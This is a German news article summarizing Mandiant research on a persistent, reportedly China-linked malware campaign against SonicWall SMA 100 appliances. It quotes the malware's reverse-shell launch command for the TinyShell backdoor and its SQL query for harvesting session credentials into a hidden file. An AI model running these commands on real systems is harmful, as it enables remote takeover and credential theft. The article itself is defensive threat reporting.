Malware zielt auf Geräte der SonicWall SMA 100-Serie
Forscher von Mandiant haben eine Malware-Kampagne entdeckt, die auf Appliances der SonicWall SMA 100-Serie abzielt und vermutlich aus China stammt.
Die Malware wurde höchstwahrscheinlich im Jahr 2021 eingeführt und hat sich als extrem widerstandsfähig erwiesen, da sie Firmware-Upgrades übersteht. Ihr primäres Ziel ist es, Benutzeranmeldeinformationen zu stehlen und dem Angreifer über eine Variante der Python-Befehlsshell TinyShell hochprivilegierten Zugriff zu gewähren.
Die Malware besteht aus einer Reihe von Bash-Skripten und einer einzelnen ELF-Binärdatei der TinyShell-Variante. Das Gesamtverhalten der bösartigen Bash-Skript-Suite zeigt ein gründliches Verständnis der Appliance und ist gut auf das System zugeschnitten, um Stabilität und Persistenz zu gewährleisten.
Bei der SMA 100 Serie handelt es sich um ein Zugangskontrollsystem, das es Remote-Benutzern ermöglicht, sich über ein Single-Sign-On-Webportal (SSO) bei Unternehmensressourcen anzumelden, und das Abfangen von Benutzeranmeldeinformationen würde dem Angreifer einen Vorteil verschaffen, um an sensible Informationen zu gelangen.
Der Haupteinstiegspunkt der Malware ist ein Bash-Skript namens firewalld, das seine Hauptschleife einmal für das Quadrat der Anzahl der Dateien auf dem System durchläuft: ... ...for j in $(ls / -R) do for i in $(ls / -R) do:... Das Skript ist für die Ausführung eines SQL-Befehls zum Stehlen von Anmeldeinformationen und für die Ausführung der anderen Komponenten zuständig.
Die Firewalld-Initialfunktion startet die TinyShell-Backdoor httpsd mit dem Befehl "nohup /bin/httpsd -cC2 IP ADDRESS> -d 5 -m -1 -p 51432 > /dev/null 2>&1 &", wenn der httpsd-Prozess nicht bereits läuft. Dies weist TinyShell an, im Reverse-Shell-Modus zu arbeiten und die angegebene IP-Adresse und den Port zu der Zeit und an dem Tag zu kontaktieren, die durch das Flag -m angegeben werden, wobei das Beacon-Intervall durch das Flag -d bestimmt wird. Wenn keine IP-Adresse angegeben wird, enthält die Binärdatei eine fest kodierte IP-Adresse, die für den Reverse-Shell-Modus verwendet wird. Sie kann auch im lauschenden Bind-Shell-Modus verwendet werden.
Das Hauptziel der Malware scheint darin zu bestehen, gehashte Anmeldedaten von allen angemeldeten Benutzern zu stehlen. In Firewalld wird dies erreicht, indem routinemäßig der SQL-Befehl select userName,password from Sessions gegen die sqlite3-Datenbank /tmp/temp.db ausgeführt und die Ergebnisse in die vom Angreifer erstellte Textdatei /tmp/syslog.db kopiert werden. Die Appliance zeichnet Sitzungsinformationen, einschließlich gehashter Anmeldedaten, in der Quelldatenbank /tmp/temp.db auf. Die Hashes können offline geknackt werden, sobald der Angreifer sie erhalten hat.
Die Forscher arbeiteten mit dem Product Security and Incident Response Team (PSIRT) von SonicWall zusammen, um ein infiziertes Gerät zu analysieren, und entdeckten, dass die Angreifer hart daran gearbeitet haben, ihr Tool stabil und beständig zu machen. Alle zehn Sekunden prüft die Malware, ob es Firmware-Upgrades gibt, und fügt sich in das Upgrade ein, um nach dem Upgrade weiterhin Anmeldedaten zu sammeln.
Zu den Quellen für diesen Artikel gehört ein Artikel in Malwarebytes.